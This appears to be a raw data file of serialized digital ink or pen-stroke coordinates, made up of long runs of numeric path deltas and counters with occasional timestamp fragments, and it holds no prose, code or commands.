0,0 0 1,0 1-1,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0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1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6 280,'0'0'1692,"0"-6"2889,0 12-4545,0 0-36,0 6-72,0-6-164,0 6-252,0-5-421,-10-1-667,10 6-392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1 644,'11'18'5420,"-11"-10"-4845,1-3-364,-1 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,-1 0 1,0-1-1,0 1 1,-1 0 0,-2 4-1,2-4-81,0-1 0,0 1 1,1 0-1,-1-1 0,1 1 0,0 0 0,1 0 0,-1 7 1,-7 2 351,4-7 888,14-11-391,2-20-143,53-53-496,-54 66-238,17-13 500,-27 23-583,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1 0 1,-1 0-1,0-1 0,1 1 1,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 1-1,1-1 1,1 2-1,-1 1-7,1 1 1,-1-1-1,1 1 0,-1 0 0,0 0 1,-1 0-1,1 0 0,1 5 1,2 5-6,12 36-1261,-14-25-8035,-3-15 6050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0 106 476,'0'0'2582,"11"7"-100,-11-5-2360,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 3-1,-2-2-46,0 1-1,0 0 1,0 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,-1 0-1,0 7 1,0 3 205,1 15 143,1-12-348,-1 0 1,-1 1-1,0-1 1,-7 31 0,7-42-69,0 0 0,1 0 0,-1 0 0,1 0 0,1 0 0,-1 1 0,1-1 0,3 12 0,2 23 50,-6-40 483,11-19 510,-1-19-328,-3 0-63,-6 32-635,0 1 0,0 0-1,0-1 1,0 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-3-9 0,1 3-21,-1 0 0,1-1 0,1 1 0,0-1 0,1 1 1,0-1-1,0 1 0,1-1 0,0 1 0,1-1 0,3-10 0,-1 0 16,-4 20-16,1-1 0,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,2-4 0,7-14 118,-9 16-88,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,3-2 0,-2 2 9,15-12 120,1 0-1,35-17 1,-50 29-164,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,1 1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 1 0,0 0-1,-1 0 1,1 1 0,0-1 0,-1 1-1,1 0 1,-1 0 0,9 4-1,-12-4 1,0-1-1,1 1 1,-1-1 0,0 1-1,0 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,1 0 1,-1 0 0,0 1-1,0-1 1,0 0-1,0 0 1,-1 2 0,-16 34-27,5-14 29,8-18 2,1 1 0,-1-1 0,0 0 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,-6 3 0,-30 25 43,8-5 83,31-26-88,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,1-1 1,-1 0-1,1 0 0,0 0 1,0 1-1,0 2 0,0-1-34,1-1 1,-1 1-1,1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 0 0,0 1 0,3 2 1,9 17-16,-11-19 13,0 0 0,1 0 0,-1 0 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,9 2 0,22 11 32,-16-4-116,-14-8-21,0-1-1,0 2 0,-1-1 0,1 0 1,-1 1-1,0 0 0,0 1 0,0-1 1,0 1-1,-1 0 0,6 8 0,-4-4-1082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4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1284,'24'-4'4548,"7"-10"-2803,0 1-1483,-21 9-199,1 0 0,-1-1 1,-1 0-1,1 0 0,16-13 0,4-2 718,-30 20-744,1-1 0,-1 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1 0,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,0 1 0,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0-1 1,-19-10 1018,15 11-987,0 1 0,-1 0 0,1 0 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-6 8 1,-7 20 383,12-27-371,1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,0 10 1,1-10-68,0 0 0,0-1 0,0 1 0,1 0 0,0-1 0,0 1 1,1-1-1,-1 1 0,1-1 0,5 10 0,-5-12-13,0-1-1,1 1 1,-1 0 0,1-1 0,-1 0-1,1 1 1,0-1 0,0 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1 0 0,5 0-1,30 10-88,12 1-1905,-47-12 1432,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0-1,-1-1 1,1 1 0,6-4 0,8-6-2343,-5 4 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13 1092,'-13'-7'3406,"10"6"-3213,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-6 2 0,8-3-175,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,1 0 0,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,1 1-1,7 5-56,-1 0 1,1 0-1,17 9 0,16 14 119,-21-16-85,-8-4 59,-13-10-49,1 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1 0-1,-1 1 1,-3 13 559,4-14-534,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,-6 4 133,0 0-1,0 0 1,0-1-1,0 0 1,0-1 0,-1 1-1,1-1 1,-1-1 0,0 1-1,1-1 1,-10 0-1,-3-2-140,15 0-28,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1-1,0 0 1,0 0 0,-6 3-1,9-3-6,2 9-388,2 12-811,9-11-6312,-2-6 4717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89 104,'11'7'4721,"-2"14"-2548,-7-19-2105,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,-1 1 0,1 2 0,0 29 505,0-14-447,-1-1-1,-1 0 1,0 0 0,-8 33-1,6-38-113,0 0 0,0 0 0,2 0 0,-1 20 0,2-33 17,2-43 43,0 34-70,1 0-1,-1-1 1,-1 1 0,1 0 0,-1-11-1,6-25 4,1-10-28,-7 44 13,0 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 0 1,9-17 0,-6 19 6,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0 1-1,0-1 1,1 1 0,0 1 0,0 0 0,0 0 0,0 0 0,18-5 0,4 5 0,-31 6 15,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1-1,-1 0 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,-1 0 0,-16 17 433,8-12-412,0 0 1,1 1 0,0 0-1,0 0 1,0 1-1,1 0 1,0 0-1,0 1 1,1 0-1,0 0 1,-8 15 0,-23 24-3648,31-40 1301,-3-1-220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15:55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1 140,'0'0'6613,"11"0"-6085,-11 6-416,10-6-64,-10 6-76,11-6-172,-11 6-292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20:51:30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575 55 1128,'-8'-4'13193,"3"3"-12574,-21 0 1474,25 1-2041,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,-1-1 1,-28-6 626,26 6-552,4 2-110,-1 0 0,1 0 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-2 0,-45 0 782,41 0-762,0 0 1,-1 1 0,1-1-1,-1 1 1,0 0 0,1 0-1,-1 1 1,0-1 0,-4 1-1,7 0 13,0 0-9,-1 0 0,0-1 0,1 2 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1-1,-4 3 1,-44-3 493,-17 23-435,64-22-96,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-1 0 0,-5 5 0,-12 9 11,19-16-13,1 0 1,-1 0-1,0 0 1,1 0-1,-1 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 0,0-1-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-2 0 81,-22 23 202,21-21-274,2-2-8,1 0-1,0 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-11 8-3,9-9 2,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,-10 19 25,15-4-4,-7-13-35,-7 2 7,9-3 2,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 5 0,-13 18 121,6-5-122,7-19 7,-1 0-1,1 1 0,0-1 1,0 1-1,-1-1 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,0 0 1,0 0-1,-2 2 0,3-3 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 0 1,1 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,1 0-1,-2 10-1,0-10 0,0-1-1,0 1 1,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1-1 0,1 1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1 8-4,-12 28 12,11-36-5,0-1-1,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,2 1 0,1 21 6,-2-21-7,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,-3 21-5,4-21 0,-2 11 18,1-11-13,-1 0-1,1 0 0,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 0-1,1 3 0,5 14 4,-3-5 26,-3-12-29,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,-1 2 0,34 28 64,-28-23-48,-5-8-16,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1 1-1,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,1 1-1,-1-1 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 1 1,2 1 1,1 1 1,-1-1-1,0 0 1,1 0 0,-1-1-1,1 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,3 1 1,-4-1 6,1 0 10,32 18-236,-32-18 245,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1-1-1,6 0 0,-2 2 33,22 2-56,-10-3-45,-12-1 50,0 1-1,0-1 1,0 0 0,0-1 0,0 0 0,0 0 0,10-3-1,58-8-5,-6 6 11,7-31-2,-55 30-19,21-18-1,-38 18 7,-2 4 0,28-10 35,24-41-53,-49 36 60,-2 16-38,0 1-1,-1-1 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,1-2 0,10-15-91,-1-28 84,-6 41 15,-3 6-10,0 0-1,-1 1 0,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,11-41-7,-12 34 6,1 7 1,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,1-1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,2-1 1,-2-2 2,1-1 0,-2 1-1,1-1 1,0 1 0,-1-1 0,0 1-1,0-1 1,-2-9 0,1 1-2,-10-16 23,6 12-389,-1-8 736,2 19-361,3 7-9,1-1 1,-1 1-1,1 0 0,0 0 0,-1-1 1,1 1-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1-1 0,1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-2-1,-1 1 3,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,-1-1-1,1 1 1,-1 0-1,1-2 1,-1 3-4,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1-1 0,1 1 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,-10-19-9,7 15 43,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-10-4 0,-18-9 210,29 14-209,0 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 1 0,0-1-1,1 1 1,0 0 0,-5 1 0,-3 1-409,0 1-1,0 1 1,-17 9-1,-35 22-5246,18-19-5923,35-16 7940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12 312,'0'0'181,"0"0"1,0-1-1,0 1 0,0-1 0,-1 1 1,1 0-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 1,1 1-104,-1-1 1,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-139,2-1-1811,-2 0 1689,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-5-1989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0 140,'0'0'3572,"-2"9"2730,-5 2-5614,4 5 65,-26 14-357,27-26-601,-5 7-76,4-11-375,2-8-703,1-6-4199,0-2 3050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68,'11'-6'4828,"-13"35"-3424,1-29-1388,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 1 0,0 0-2,-13 23 417,-5 5-1,17-29-398,20-37-5230,-17 29 3102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0 112,'0'0'1355,"9"0"-243,-10 1-910,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 1,1 3-1,33 4 1242,-31-7-1382,0 0 0,1 0 1,-1 0-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,3-2 0,-3 1-33,-1 0-1,1 0 0,-1 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,7 2 0,-6-2-99,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0-1,6-3 1,23-13-4546,-31 11 2296,-2 0-163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36,'10'-17'5902,"-11"19"-5941,0-2 406,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0 1 394,1 10 2336,3-12-3011,-3 0-72,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1-1-1,-1 1 1,0-1-1,0 0 1,1 1-1,30 13 506,-10-5-343,-19-7-168,0 0 1,1-1-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,6 0 1,7-1 25,-4-1 21,0 1 1,1 1-1,-1 0 1,14 3-1,-3-3-35,-21-2-17,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,1 1 0,32 5 154,58-7 3,-91 0-164,17 4 71,0-1 0,0 0 0,33-1 0,-1-2-161,-50 0 78,44-6 145,-35 6-120,-6-1-10,0 1 0,1-1 1,-1 1-1,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,7 3 0,34-3 115,20-1-95,-15 0-350,-48 0 303,4 3 86,1-1 0,0 0 0,0 0 0,0-1-1,11 1 1,-16-2-26,-1 1-34,0 0-1,0 0 1,1 0-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1-1 1,-1 1-1,4-1 0,7 1-12,17 7 12,15-2 79,-41-1-36,-2-3-40,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 1,1 0-1,-1 0 0,1 0 0,1 1 0,26 5 271,-26-6-117,32-6 1338,-21 3-1204,-38 0-1624,-27-7-7072,18 2 2507,12 7 2165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11 322 112,'0'0'3784,"-11"5"-1543,11-10 717,1-8 1672,7 1-4241,7-23-349,-3 19-62,-3 1 22,-2 10-1,-5 4 3,-1-2 26,-1 1 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1-1 0,0 0 0,2-2 0,-1-13 329,1 16-335,-3 0-19,-1 1 1,0 0 0,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1-1-1,0 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 0-1,21-16 231,5-18 97,4 10 435,-27 24-688,1-2-56,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,8-3 1,-10 5-4,3-9 90,-5 10-107,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 0,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0 1 1,1-1-1,6-3 69,0 1 0,0 0 0,0 1-1,0 0 1,10-1 0,15-16 96,-21 13-78,10-2-51,-19 7-26,29 11-5,-29-10 11,-2-1 1,-1 3-16,11 5 29,-9-7-15,1-1-5,0 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,-1 0 0,1-1 1,0 1-1,-1 0 0,4 2 0,0 0-48,-3-2 52,0 0-2,1 0 1,-1 1-1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1 2 0,19 8 79,21 7 320,-44-18-411,11 1 4,-9-3 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 0 0,1 2 0,-1-2-5,11 6 27,-3 2 14,-7-9-40,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 2 0,3 2 19,-3-5-18,-1 1 0,1-1-1,-1 0 1,0 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,-1 3 9,1-2-10,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2 1 0,-3-3-2,1 1 0,-1-1 1,0 1-1,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,-5 9 50,6-9-46,0-1-5,0 0 1,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-9 11 10,7-10-7,-3 14 20,4-14-22,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,1 2 0,-1 51 310,0-52-233,1-13 18,0 12-162,-1 0 0,0 